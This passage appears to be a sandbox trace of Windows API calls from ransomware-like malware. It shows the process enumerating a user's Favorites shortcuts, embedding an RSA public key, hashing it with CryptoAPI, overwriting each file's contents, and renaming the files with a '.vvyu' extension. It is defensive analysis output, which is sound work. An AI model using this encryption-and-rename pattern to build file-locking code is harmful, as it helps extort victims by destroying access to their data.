lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.189] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.190] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0193.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0193.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0193.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0193.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0193.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0193.192] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.192] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.192] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.192] CloseHandle (hObject=0x584) returned 1 [0193.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0193.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0193.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0193.194] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at home.url.vvyu")) returned 1 [0193.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.196] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0193.200] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0193.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbc38 [0193.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0193.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbc38 | out: hHeap=0x2c0000) returned 1 [0193.200] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0193.200] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.201] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0193.201] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0193.204] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.205] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.206] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.206] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0193.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0193.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.206] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0193.207] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0193.207] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.207] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0193.207] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0193.207] GetLastError () returned 0x0 [0193.208] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0193.208] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0193.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0193.208] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0193.208] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0193.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0193.208] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0193.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0193.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0193.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0193.208] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3db0 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6260 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3df8 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6278 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62c0 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0193.209] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0193.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0193.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0193.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62c0 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae62a8 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0193.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0193.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0193.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0193.212] GetCurrentThreadId () returned 0x5d8 [0193.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0193.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7968 [0193.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0193.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0193.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0193.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0193.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0193.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.212] GetCurrentThreadId () returned 0x5d8 [0193.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0193.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0193.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0193.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0193.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0193.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0193.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62a8 [0193.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0193.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62c0 [0193.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0193.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6290 [0193.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6320 [0193.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0193.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0193.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62d8 [0193.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6338 [0193.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62d8 [0193.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62f0 | out: hHeap=0x2c0000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0193.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0193.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0193.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae62a8 [0193.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0193.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6308 | out: hHeap=0x2c0000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0193.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0193.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0193.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0193.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62a8 | out: hHeap=0x2c0000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0193.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0193.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0193.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0193.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0193.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0193.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0193.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0193.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0193.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0193.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62d8 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0193.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae62c0 | out: hHeap=0x2c0000) returned 1 [0193.220] 